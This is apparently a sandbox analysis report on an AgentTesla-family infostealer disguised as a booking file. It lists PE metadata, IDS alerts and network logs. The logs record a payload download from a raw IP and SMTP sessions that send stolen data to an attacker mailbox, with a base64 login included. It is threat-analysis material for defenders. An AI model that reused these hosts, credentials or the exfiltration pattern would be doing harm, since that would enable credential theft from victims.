IMAGE_DIRECTORY_ENTRY_IMPORT	0x1b8c10	0x57	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x1ba000	0x2f0e0	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x1e6400	0x29c0	.rsrc
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x1ea000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0x1b6c70	0x1b6e00	4aa58884d0c649685a5f4a00bc28fa05	False	0.7391701972372543	data	7.388391889899485	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0x1ba000	0x2f0e0	0x2f200	2a5e0af91cbdc88baa6a4726f79ca939	False	0.3625300480769231	data	6.241165058862461	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x1ea000	0xc	0x200	85e01f3d49084dabd4a0afb0dcd94f4d	False	0.044921875	data	0.10191042566270775	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	ZLIB Complexity
RT_ICON	0x1ba2b0	0x709e	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced	0.9976066597294485
RT_ICON	0x1c1350	0x10828	Device independent bitmap graphic, 128 x 256 x 32, image size 67584	0.17033893292322252
RT_ICON	0x1d1b78	0x94a8	Device independent bitmap graphic, 96 x 192 x 32, image size 38016	0.271415808282531
RT_ICON	0x1db020	0x5488	Device independent bitmap graphic, 72 x 144 x 32, image size 21600	0.3012014787430684
RT_ICON	0x1e04a8	0x4228	Device independent bitmap graphic, 64 x 128 x 32, image size 16896	0.28259329239489844
RT_ICON	0x1e46d0	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9600	0.38558091286307056
RT_ICON	0x1e6c78	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4224	0.4598968105065666
RT_ICON	0x1e7d20	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 2400	0.5704918032786885
RT_ICON	0x1e86a8	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1088	0.6631205673758865
RT_GROUP_ICON	0x1e8b10	0x84	data	0.7272727272727273
RT_VERSION	0x1e8b94	0x396	big endian ispell hash file (?),	0.42919389978213507
RT_MANIFEST	0x1e8f2c	0x1b4	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with very long lines (433), with no line terminators	0.5642201834862385

Imports

DLL	Import
mscoree.dll	_CorExeMain

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-10-06T10:41:05.744776+0200	2030171	ET MALWARE AgentTesla Exfil Via SMTP	1	192.168.2.4	49744	162.254.34.31	587	TCP
2024-10-06T10:41:05.744776+0200	2840032	ETPRO MALWARE Win32/AgentTesla/OriginLogger Data Exfil via SMTP M2	1	192.168.2.4	49744	162.254.34.31	587	TCP
2024-10-06T10:41:05.744776+0200	2030171	ET MALWARE AgentTesla Exfil Via SMTP	1	192.168.2.4	49733	162.254.34.31	587	TCP
2024-10-06T10:41:05.744776+0200	2840032	ETPRO MALWARE Win32/AgentTesla/OriginLogger Data Exfil via SMTP M2	1	192.168.2.4	49733	162.254.34.31	587	TCP
2024-10-06T10:41:09.676370+0200	2855245	ETPRO MALWARE Agent Tesla Exfil via SMTP	1	192.168.2.4	49733	162.254.34.31	587	TCP
2024-10-06T10:41:09.676370+0200	2855542	ETPRO MALWARE Agent Tesla CnC Exfil Activity	1	192.168.2.4	49733	162.254.34.31	587	TCP
2024-10-06T10:41:21.884305+0200	2855245	ETPRO MALWARE Agent Tesla Exfil via SMTP	1	192.168.2.4	49735	162.254.34.31	587	TCP
2024-10-06T10:41:21.884305+0200	2855542	ETPRO MALWARE Agent Tesla CnC Exfil Activity	1	192.168.2.4	49735	162.254.34.31	587	TCP
2024-10-06T10:41:30.310112+0200	2855245	ETPRO MALWARE Agent Tesla Exfil via SMTP	1	192.168.2.4	49744	162.254.34.31	587	TCP
2024-10-06T10:41:30.310112+0200	2855542	ETPRO MALWARE Agent Tesla CnC Exfil Activity	1	192.168.2.4	49744	162.254.34.31	587	TCP
2024-10-06T10:43:00.505463+0200	2030171	ET MALWARE AgentTesla Exfil Via SMTP	1	192.168.2.4	49735	162.254.34.31	587	TCP
2024-10-06T10:43:00.505463+0200	2840032	ETPRO MALWARE Win32/AgentTesla/OriginLogger Data Exfil via SMTP M2	1	192.168.2.4	49735	162.254.34.31	587	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 6, 2024 10:41:05.744776011 CEST	49731	80	192.168.2.4	172.86.66.70
Oct 6, 2024 10:41:05.750091076 CEST	80	49731	172.86.66.70	192.168.2.4
Oct 6, 2024 10:41:05.750169992 CEST	49731	80	192.168.2.4	172.86.66.70
Oct 6, 2024 10:41:05.753670931 CEST	49731	80	192.168.2.4	172.86.66.70
Oct 6, 2024 10:41:05.759051085 CEST	80	49731	172.86.66.70	192.168.2.4
Oct 6, 2024 10:41:06.421905994 CEST	49732	443	192.168.2.4	172.67.74.152
Oct 6, 2024 10:41:06.421993017 CEST	443	49732	172.67.74.152	192.168.2.4
Oct 6, 2024 10:41:06.422085047 CEST	49732	443	192.168.2.4	172.67.74.152
Oct 6, 2024 10:41:06.430159092 CEST	49732	443	192.168.2.4	172.67.74.152
Oct 6, 2024 10:41:06.430238008 CEST	443	49732	172.67.74.152	192.168.2.4
Oct 6, 2024 10:41:06.905111074 CEST	443	49732	172.67.74.152	192.168.2.4
Oct 6, 2024 10:41:06.905297995 CEST	49732	443	192.168.2.4	172.67.74.152
Oct 6, 2024 10:41:06.909167051 CEST	49732	443	192.168.2.4	172.67.74.152
Oct 6, 2024 10:41:06.909220934 CEST	443	49732	172.67.74.152	192.168.2.4
Oct 6, 2024 10:41:06.909641027 CEST	443	49732	172.67.74.152	192.168.2.4
Oct 6, 2024 10:41:06.953486919 CEST	49732	443	192.168.2.4	172.67.74.152
Oct 6, 2024 10:41:06.961141109 CEST	49732	443	192.168.2.4	172.67.74.152
Oct 6, 2024 10:41:07.007428885 CEST	443	49732	172.67.74.152	192.168.2.4
Oct 6, 2024 10:41:07.066243887 CEST	443	49732	172.67.74.152	192.168.2.4
Oct 6, 2024 10:41:07.066365004 CEST	443	49732	172.67.74.152	192.168.2.4
Oct 6, 2024 10:41:07.066689968 CEST	49732	443	192.168.2.4	172.67.74.152
Oct 6, 2024 10:41:07.072333097 CEST	49732	443	192.168.2.4	172.67.74.152
Oct 6, 2024 10:41:07.574585915 CEST	49733	587	192.168.2.4	162.254.34.31
Oct 6, 2024 10:41:07.580018044 CEST	587	49733	162.254.34.31	192.168.2.4
Oct 6, 2024 10:41:07.580115080 CEST	49733	587	192.168.2.4	162.254.34.31
Oct 6, 2024 10:41:08.376049042 CEST	587	49733	162.254.34.31	192.168.2.4
Oct 6, 2024 10:41:08.376255035 CEST	49733	587	192.168.2.4	162.254.34.31
Oct 6, 2024 10:41:08.381613016 CEST	587	49733	162.254.34.31	192.168.2.4
Oct 6, 2024 10:41:08.540047884 CEST	587	49733	162.254.34.31	192.168.2.4
Oct 6, 2024 10:41:08.540978909 CEST	49733	587	192.168.2.4	162.254.34.31
Oct 6, 2024 10:41:08.546277046 CEST	587	49733	162.254.34.31	192.168.2.4
Oct 6, 2024 10:41:08.850152969 CEST	587	49733	162.254.34.31	192.168.2.4
Oct 6, 2024 10:41:08.854209900 CEST	49733	587	192.168.2.4	162.254.34.31
Oct 6, 2024 10:41:08.859607935 CEST	587	49733	162.254.34.31	192.168.2.4
Oct 6, 2024 10:41:09.021239042 CEST	587	49733	162.254.34.31	192.168.2.4
Oct 6, 2024 10:41:09.022116899 CEST	49733	587	192.168.2.4	162.254.34.31
Oct 6, 2024 10:41:09.027481079 CEST	587	49733	162.254.34.31	192.168.2.4
Oct 6, 2024 10:41:09.187855959 CEST	587	49733	162.254.34.31	192.168.2.4
Oct 6, 2024 10:41:09.189198971 CEST	49733	587	192.168.2.4	162.254.34.31
Oct 6, 2024 10:41:09.194494963 CEST	587	49733	162.254.34.31	192.168.2.4
Oct 6, 2024 10:41:09.362739086 CEST	587	49733	162.254.34.31	192.168.2.4
Oct 6, 2024 10:41:09.369837046 CEST	49733	587	192.168.2.4	162.254.34.31
Oct 6, 2024 10:41:09.375519037 CEST	587	49733	162.254.34.31	192.168.2.4
Oct 6, 2024 10:41:09.669445992 CEST	587	49733	162.254.34.31	192.168.2.4
Oct 6, 2024 10:41:09.676368952 CEST	49733	587	192.168.2.4	162.254.34.31
Oct 6, 2024 10:41:09.676369905 CEST	49733	587	192.168.2.4	162.254.34.31
Oct 6, 2024 10:41:09.676369905 CEST	49733	587	192.168.2.4	162.254.34.31
Oct 6, 2024 10:41:09.676467896 CEST	49733	587	192.168.2.4	162.254.34.31
Oct 6, 2024 10:41:09.682101965 CEST	587	49733	162.254.34.31	192.168.2.4
Oct 6, 2024 10:41:09.682143927 CEST	587	49733	162.254.34.31	192.168.2.4
Oct 6, 2024 10:41:09.682173014 CEST	587	49733	162.254.34.31	192.168.2.4
Oct 6, 2024 10:41:09.682200909 CEST	587	49733	162.254.34.31	192.168.2.4
Oct 6, 2024 10:41:09.954466105 CEST	587	49733	162.254.34.31	192.168.2.4
Oct 6, 2024 10:41:10.000289917 CEST	49733	587	192.168.2.4	162.254.34.31
Oct 6, 2024 10:41:19.018610954 CEST	49734	443	192.168.2.4	172.67.74.152
Oct 6, 2024 10:41:19.018723011 CEST	443	49734	172.67.74.152	192.168.2.4
Oct 6, 2024 10:41:19.018805981 CEST	49734	443	192.168.2.4	172.67.74.152
Oct 6, 2024 10:41:19.021640062 CEST	49734	443	192.168.2.4	172.67.74.152
Oct 6, 2024 10:41:19.021677971 CEST	443	49734	172.67.74.152	192.168.2.4
Oct 6, 2024 10:41:19.487170935 CEST	443	49734	172.67.74.152	192.168.2.4
Oct 6, 2024 10:41:19.487274885 CEST	49734	443	192.168.2.4	172.67.74.152
Oct 6, 2024 10:41:19.488773108 CEST	49734	443	192.168.2.4	172.67.74.152
Oct 6, 2024 10:41:19.488795996 CEST	443	49734	172.67.74.152	192.168.2.4
Oct 6, 2024 10:41:19.489146948 CEST	443	49734	172.67.74.152	192.168.2.4
Oct 6, 2024 10:41:19.531575918 CEST	49734	443	192.168.2.4	172.67.74.152
Oct 6, 2024 10:41:19.753737926 CEST	49734	443	192.168.2.4	172.67.74.152
Oct 6, 2024 10:41:19.795435905 CEST	443	49734	172.67.74.152	192.168.2.4
Oct 6, 2024 10:41:19.858678102 CEST	443	49734	172.67.74.152	192.168.2.4
Oct 6, 2024 10:41:19.858814001 CEST	443	49734	172.67.74.152	192.168.2.4
Oct 6, 2024 10:41:19.858869076 CEST	49734	443	192.168.2.4	172.67.74.152
Oct 6, 2024 10:41:19.861141920 CEST	49734	443	192.168.2.4	172.67.74.152
Oct 6, 2024 10:41:20.318643093 CEST	49735	587	192.168.2.4	162.254.34.31
Oct 6, 2024 10:41:20.323690891 CEST	587	49735	162.254.34.31	192.168.2.4
Oct 6, 2024 10:41:20.323788881 CEST	49735	587	192.168.2.4	162.254.34.31
Oct 6, 2024 10:41:20.905759096 CEST	587	49735	162.254.34.31	192.168.2.4
Oct 6, 2024 10:41:20.906091928 CEST	49735	587	192.168.2.4	162.254.34.31
Oct 6, 2024 10:41:20.911020041 CEST	587	49735	162.254.34.31	192.168.2.4
Oct 6, 2024 10:41:21.066093922 CEST	587	49735	162.254.34.31	192.168.2.4
Oct 6, 2024 10:41:21.070976019 CEST	49735	587	192.168.2.4	162.254.34.31
Oct 6, 2024 10:41:21.076190948 CEST	587	49735	162.254.34.31	192.168.2.4
Oct 6, 2024 10:41:21.231911898 CEST	587	49735	162.254.34.31	192.168.2.4
Oct 6, 2024 10:41:21.232131004 CEST	49735	587	192.168.2.4	162.254.34.31
Oct 6, 2024 10:41:21.237081051 CEST	587	49735	162.254.34.31	192.168.2.4
Oct 6, 2024 10:41:21.395107031 CEST	587	49735	162.254.34.31	192.168.2.4
Oct 6, 2024 10:41:21.395365953 CEST	49735	587	192.168.2.4	162.254.34.31
Oct 6, 2024 10:41:21.400433064 CEST	587	49735	162.254.34.31	192.168.2.4
Oct 6, 2024 10:41:21.558557987 CEST	587	49735	162.254.34.31	192.168.2.4
Oct 6, 2024 10:41:21.558716059 CEST	49735	587	192.168.2.4	162.254.34.31
Oct 6, 2024 10:41:21.563550949 CEST	587	49735	162.254.34.31	192.168.2.4
Oct 6, 2024 10:41:21.722807884 CEST	587	49735	162.254.34.31	192.168.2.4
Oct 6, 2024 10:41:21.723124027 CEST	49735	587	192.168.2.4	162.254.34.31
Oct 6, 2024 10:41:21.728146076 CEST	587	49735	162.254.34.31	192.168.2.4
Oct 6, 2024 10:41:21.883572102 CEST	587	49735	162.254.34.31	192.168.2.4
Oct 6, 2024 10:41:21.884212971 CEST	49735	587	192.168.2.4	162.254.34.31
Oct 6, 2024 10:41:21.884305000 CEST	49735	587	192.168.2.4	162.254.34.31
Oct 6, 2024 10:41:21.884305000 CEST	49735	587	192.168.2.4	162.254.34.31
Oct 6, 2024 10:41:21.884305000 CEST	49735	587	192.168.2.4	162.254.34.31
Oct 6, 2024 10:41:21.889229059 CEST	587	49735	162.254.34.31	192.168.2.4
Oct 6, 2024 10:41:21.889261007 CEST	587	49735	162.254.34.31	192.168.2.4
Oct 6, 2024 10:41:21.889425993 CEST	587	49735	162.254.34.31	192.168.2.4
Oct 6, 2024 10:41:21.889455080 CEST	587	49735	162.254.34.31	192.168.2.4
Oct 6, 2024 10:41:22.154721975 CEST	587	49735	162.254.34.31	192.168.2.4
Oct 6, 2024 10:41:22.203459024 CEST	49735	587	192.168.2.4	162.254.34.31
Oct 6, 2024 10:41:27.137725115 CEST	80	49731	172.86.66.70	192.168.2.4
Oct 6, 2024 10:41:27.137950897 CEST	49731	80	192.168.2.4	172.86.66.70
Oct 6, 2024 10:41:27.143980026 CEST	49731	80	192.168.2.4	172.86.66.70
Oct 6, 2024 10:41:27.144676924 CEST	49742	80	192.168.2.4	172.86.66.70
Oct 6, 2024 10:41:27.149007082 CEST	80	49731	172.86.66.70	192.168.2.4
Oct 6, 2024 10:41:27.149684906 CEST	80	49742	172.86.66.70	192.168.2.4
Oct 6, 2024 10:41:27.149761915 CEST	49742	80	192.168.2.4	172.86.66.70
Oct 6, 2024 10:41:27.150194883 CEST	49742	80	192.168.2.4	172.86.66.70
Oct 6, 2024 10:41:27.155047894 CEST	80	49742	172.86.66.70	192.168.2.4
Oct 6, 2024 10:41:27.394963026 CEST	49743	443	192.168.2.4	172.67.74.152
Oct 6, 2024 10:41:27.395057917 CEST	443	49743	172.67.74.152	192.168.2.4
Oct 6, 2024 10:41:27.395133018 CEST	49743	443	192.168.2.4	172.67.74.152
Oct 6, 2024 10:41:27.398977995 CEST	49743	443	192.168.2.4	172.67.74.152
Oct 6, 2024 10:41:27.399013996 CEST	443	49743	172.67.74.152	192.168.2.4
Oct 6, 2024 10:41:27.868012905 CEST	443	49743	172.67.74.152	192.168.2.4
Oct 6, 2024 10:41:27.868108988 CEST	49743	443	192.168.2.4	172.67.74.152
Oct 6, 2024 10:41:27.871731997 CEST	49743	443	192.168.2.4	172.67.74.152
Oct 6, 2024 10:41:27.871763945 CEST	443	49743	172.67.74.152	192.168.2.4
Oct 6, 2024 10:41:27.872170925 CEST	443	49743	172.67.74.152	192.168.2.4
Oct 6, 2024 10:41:27.917099953 CEST	49743	443	192.168.2.4	172.67.74.152
Oct 6, 2024 10:41:27.963402987 CEST	443	49743	172.67.74.152	192.168.2.4
Oct 6, 2024 10:41:28.023971081 CEST	443	49743	172.67.74.152	192.168.2.4
Oct 6, 2024 10:41:28.024100065 CEST	443	49743	172.67.74.152	192.168.2.4
Oct 6, 2024 10:41:28.024163961 CEST	49743	443	192.168.2.4	172.67.74.152
Oct 6, 2024 10:41:28.026324034 CEST	49743	443	192.168.2.4	172.67.74.152
Oct 6, 2024 10:41:28.422859907 CEST	49744	587	192.168.2.4	162.254.34.31
Oct 6, 2024 10:41:28.428361893 CEST	587	49744	162.254.34.31	192.168.2.4
Oct 6, 2024 10:41:28.428505898 CEST	49744	587	192.168.2.4	162.254.34.31
Oct 6, 2024 10:41:29.104602098 CEST	587	49744	162.254.34.31	192.168.2.4
Oct 6, 2024 10:41:29.105488062 CEST	49744	587	192.168.2.4	162.254.34.31
Oct 6, 2024 10:41:29.110609055 CEST	587	49744	162.254.34.31	192.168.2.4
Oct 6, 2024 10:41:29.280472040 CEST	587	49744	162.254.34.31	192.168.2.4
Oct 6, 2024 10:41:29.280780077 CEST	49744	587	192.168.2.4	162.254.34.31
Oct 6, 2024 10:41:29.286499023 CEST	587	49744	162.254.34.31	192.168.2.4
Oct 6, 2024 10:41:29.442126036 CEST	587	49744	162.254.34.31	192.168.2.4
Oct 6, 2024 10:41:29.445965052 CEST	49744	587	192.168.2.4	162.254.34.31
Oct 6, 2024 10:41:29.451308012 CEST	587	49744	162.254.34.31	192.168.2.4
Oct 6, 2024 10:41:29.611310959 CEST	587	49744	162.254.34.31	192.168.2.4
Oct 6, 2024 10:41:29.611500025 CEST	49744	587	192.168.2.4	162.254.34.31
Oct 6, 2024 10:41:29.616688013 CEST	587	49744	162.254.34.31	192.168.2.4
Oct 6, 2024 10:41:29.775531054 CEST	587	49744	162.254.34.31	192.168.2.4
Oct 6, 2024 10:41:29.775758028 CEST	49744	587	192.168.2.4	162.254.34.31
Oct 6, 2024 10:41:29.781111956 CEST	587	49744	162.254.34.31	192.168.2.4
Oct 6, 2024 10:41:29.940088034 CEST	587	49744	162.254.34.31	192.168.2.4
Oct 6, 2024 10:41:29.940234900 CEST	49744	587	192.168.2.4	162.254.34.31
Oct 6, 2024 10:41:29.945434093 CEST	587	49744	162.254.34.31	192.168.2.4
Oct 6, 2024 10:41:30.309226036 CEST	587	49744	162.254.34.31	192.168.2.4
Oct 6, 2024 10:41:30.310112000 CEST	49744	587	192.168.2.4	162.254.34.31
Oct 6, 2024 10:41:30.310112000 CEST	49744	587	192.168.2.4	162.254.34.31
Oct 6, 2024 10:41:30.310112000 CEST	49744	587	192.168.2.4	162.254.34.31
Oct 6, 2024 10:41:30.310112000 CEST	49744	587	192.168.2.4	162.254.34.31
Oct 6, 2024 10:41:30.310405970 CEST	587	49744	162.254.34.31	192.168.2.4
Oct 6, 2024 10:41:30.310739040 CEST	49744	587	192.168.2.4	162.254.34.31
Oct 6, 2024 10:41:30.315859079 CEST	587	49744	162.254.34.31	192.168.2.4
Oct 6, 2024 10:41:30.315903902 CEST	587	49744	162.254.34.31	192.168.2.4
Oct 6, 2024 10:41:30.315948009 CEST	587	49744	162.254.34.31	192.168.2.4
Oct 6, 2024 10:41:30.315960884 CEST	587	49744	162.254.34.31	192.168.2.4
Oct 6, 2024 10:41:30.581976891 CEST	587	49744	162.254.34.31	192.168.2.4
Oct 6, 2024 10:41:30.641022921 CEST	49744	587	192.168.2.4	162.254.34.31
Oct 6, 2024 10:41:48.531208992 CEST	80	49742	172.86.66.70	192.168.2.4
Oct 6, 2024 10:41:48.531492949 CEST	49742	80	192.168.2.4	172.86.66.70
Oct 6, 2024 10:41:48.532085896 CEST	49742	80	192.168.2.4	172.86.66.70
Oct 6, 2024 10:41:48.537621021 CEST	80	49742	172.86.66.70	192.168.2.4
Oct 6, 2024 10:42:47.594800949 CEST	49733	587	192.168.2.4	162.254.34.31
Oct 6, 2024 10:42:47.600424051 CEST	587	49733	162.254.34.31	192.168.2.4
Oct 6, 2024 10:42:47.757987976 CEST	587	49733	162.254.34.31	192.168.2.4
Oct 6, 2024 10:42:47.758040905 CEST	587	49733	162.254.34.31	192.168.2.4
Oct 6, 2024 10:42:47.758228064 CEST	49733	587	192.168.2.4	162.254.34.31
Oct 6, 2024 10:42:47.758228064 CEST	49733	587	192.168.2.4	162.254.34.31
Oct 6, 2024 10:42:47.765022993 CEST	587	49733	162.254.34.31	192.168.2.4
Oct 6, 2024 10:43:00.345022917 CEST	49735	587	192.168.2.4	162.254.34.31
Oct 6, 2024 10:43:00.350470066 CEST	587	49735	162.254.34.31	192.168.2.4
Oct 6, 2024 10:43:00.505306005 CEST	587	49735	162.254.34.31	192.168.2.4
Oct 6, 2024 10:43:00.505462885 CEST	49735	587	192.168.2.4	162.254.34.31
Oct 6, 2024 10:43:00.505661011 CEST	587	49735	162.254.34.31	192.168.2.4
Oct 6, 2024 10:43:00.505731106 CEST	49735	587	192.168.2.4	162.254.34.31
Oct 6, 2024 10:43:00.510468006 CEST	587	49735	162.254.34.31	192.168.2.4
Oct 6, 2024 10:43:08.454293013 CEST	49744	587	192.168.2.4	162.254.34.31
Oct 6, 2024 10:43:08.459341049 CEST	587	49744	162.254.34.31	192.168.2.4
Oct 6, 2024 10:43:08.616071939 CEST	587	49744	162.254.34.31	192.168.2.4
Oct 6, 2024 10:43:08.616131067 CEST	587	49744	162.254.34.31	192.168.2.4
Oct 6, 2024 10:43:08.616221905 CEST	49744	587	192.168.2.4	162.254.34.31
Oct 6, 2024 10:43:08.616286039 CEST	49744	587	192.168.2.4	162.254.34.31
Oct 6, 2024 10:43:08.621449947 CEST	587	49744	162.254.34.31	192.168.2.4

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 6, 2024 10:41:06.354768991 CEST	53863	53	192.168.2.4	1.1.1.1
Oct 6, 2024 10:41:06.362086058 CEST	53	53863	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Oct 6, 2024 10:41:06.354768991 CEST	192.168.2.4	1.1.1.1	0x9fe8	Standard query (0)	api.ipify.org	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class	DNS over HTTPS
Oct 6, 2024 10:41:06.362086058 CEST	1.1.1.1	192.168.2.4	0x9fe8	No error (0)	api.ipify.org	172.67.74.152	A (IP address)	IN (0x0001)	false
Oct 6, 2024 10:41:06.362086058 CEST	1.1.1.1	192.168.2.4	0x9fe8	No error (0)	api.ipify.org	104.26.13.205	A (IP address)	IN (0x0001)	false
Oct 6, 2024 10:41:06.362086058 CEST	1.1.1.1	192.168.2.4	0x9fe8	No error (0)	api.ipify.org	104.26.12.205	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

api.ipify.org

172.86.66.70

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49731	172.86.66.70	80	7588	C:\Users\user\AppData\Local\Temp\doc-d.exe

Timestamp	Bytes transferred	Direction	Data
Oct 6, 2024 10:41:05.753670931 CEST	73	OUT	GET /3y/doci.exe HTTP/1.1 Host: 172.86.66.70 Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49742	172.86.66.70	80	7588	C:\Users\user\AppData\Local\Temp\doc-d.exe

Timestamp	Bytes transferred	Direction	Data
Oct 6, 2024 10:41:27.150194883 CEST	73	OUT	GET /3y/doci.exe HTTP/1.1 Host: 172.86.66.70 Connection: Keep-Alive

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49732	172.67.74.152	443	7628	C:\Users\user\Desktop\Booking_0106.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-06 08:41:06 UTC	155	OUT	GET / HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0 Host: api.ipify.org Connection: Keep-Alive
2024-10-06 08:41:07 UTC	211	IN	HTTP/1.1 200 OK Date: Sun, 06 Oct 2024 08:41:07 GMT Content-Type: text/plain Content-Length: 11 Connection: close Vary: Origin CF-Cache-Status: DYNAMIC Server: cloudflare CF-RAY: 8ce459badc56c32c-EWR
2024-10-06 08:41:07 UTC	11	IN	Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33 Data Ascii: 8.46.123.33

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49734	172.67.74.152	443	7924	C:\Users\user\AppData\Roaming\ibrzb.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-06 08:41:19 UTC	155	OUT	GET / HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0 Host: api.ipify.org Connection: Keep-Alive
2024-10-06 08:41:19 UTC	211	IN	HTTP/1.1 200 OK Date: Sun, 06 Oct 2024 08:41:19 GMT Content-Type: text/plain Content-Length: 11 Connection: close Vary: Origin CF-Cache-Status: DYNAMIC Server: cloudflare CF-RAY: 8ce45a0ace550f78-EWR
2024-10-06 08:41:19 UTC	11	IN	Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33 Data Ascii: 8.46.123.33

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49743	172.67.74.152	443	6096	C:\Users\user\AppData\Roaming\ibrzb.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-06 08:41:27 UTC	155	OUT	GET / HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0 Host: api.ipify.org Connection: Keep-Alive
2024-10-06 08:41:28 UTC	211	IN	HTTP/1.1 200 OK Date: Sun, 06 Oct 2024 08:41:27 GMT Content-Type: text/plain Content-Length: 11 Connection: close Vary: Origin CF-Cache-Status: DYNAMIC Server: cloudflare CF-RAY: 8ce45a3ddb9a0f47-EWR
2024-10-06 08:41:28 UTC	11	IN	Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33 Data Ascii: 8.46.123.33

SMTP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP	Commands
Oct 6, 2024 10:41:08.376049042 CEST	587	49733	162.254.34.31	192.168.2.4	220 server1.educt.shop127.0.0.1 ESMTP Postfix
Oct 6, 2024 10:41:08.376255035 CEST	49733	587	192.168.2.4	162.254.34.31	EHLO 549163
Oct 6, 2024 10:41:08.540047884 CEST	587	49733	162.254.34.31	192.168.2.4	250-server1.educt.shop127.0.0.1 250-PIPELINING 250-SIZE 204800000 250-ETRN 250-STARTTLS 250-AUTH PLAIN LOGIN 250-AUTH=PLAIN LOGIN 250-ENHANCEDSTATUSCODES 250-8BITMIME 250-DSN 250 CHUNKING
Oct 6, 2024 10:41:08.540978909 CEST	49733	587	192.168.2.4	162.254.34.31	AUTH login c2VuZHhhbWJyb0BlZHVjdC5zaG9w
Oct 6, 2024 10:41:08.850152969 CEST	587	49733	162.254.34.31	192.168.2.4	334 UGFzc3dvcmQ6
Oct 6, 2024 10:41:09.021239042 CEST	587	49733	162.254.34.31	192.168.2.4	235 2.7.0 Authentication successful
Oct 6, 2024 10:41:09.022116899 CEST	49733	587	192.168.2.4	162.254.34.31	MAIL FROM:<sendxambro@educt.shop>
Oct 6, 2024 10:41:09.187855959 CEST	587	49733	162.254.34.31	192.168.2.4	250 2.1.0 Ok
Oct 6, 2024 10:41:09.189198971 CEST	49733	587	192.168.2.4	162.254.34.31	RCPT TO:<ambro@educt.shop>
Oct 6, 2024 10:41:09.362739086 CEST	587	49733	162.254.34.31	192.168.2.4	250 2.1.5 Ok
Oct 6, 2024 10:41:09.369837046 CEST	49733	587	192.168.2.4	162.254.34.31	DATA
Oct 6, 2024 10:41:09.669445992 CEST	587	49733	162.254.34.31	192.168.2.4	354 End data with <CR><LF>.<CR><LF>
Oct 6, 2024 10:41:09.676467896 CEST	49733	587	192.168.2.4	162.254.34.31	.
Oct 6, 2024 10:41:09.954466105 CEST	587	49733	162.254.34.31	192.168.2.4	250 2.0.0 Ok: queued as 44E4760DB5
Oct 6, 2024 10:41:20.905759096 CEST	587	49735	162.254.34.31	192.168.2.4	220 server1.educt.shop127.0.0.1 ESMTP Postfix
Oct 6, 2024 10:41:20.906091928 CEST	49735	587	192.168.2.4	162.254.34.31	EHLO 549163
Oct 6, 2024 10:41:21.066093922 CEST	587	49735	162.254.34.31	192.168.2.4	250-server1.educt.shop127.0.0.1 250-PIPELINING 250-SIZE 204800000 250-ETRN 250-STARTTLS 250-AUTH PLAIN LOGIN 250-AUTH=PLAIN LOGIN 250-ENHANCEDSTATUSCODES 250-8BITMIME 250-DSN 250 CHUNKING
Oct 6, 2024 10:41:21.070976019 CEST	49735	587	192.168.2.4	162.254.34.31	AUTH login c2VuZHhhbWJyb0BlZHVjdC5zaG9w
Oct 6, 2024 10:41:21.231911898 CEST	587	49735	162.254.34.31	192.168.2.4	334 UGFzc3dvcmQ6
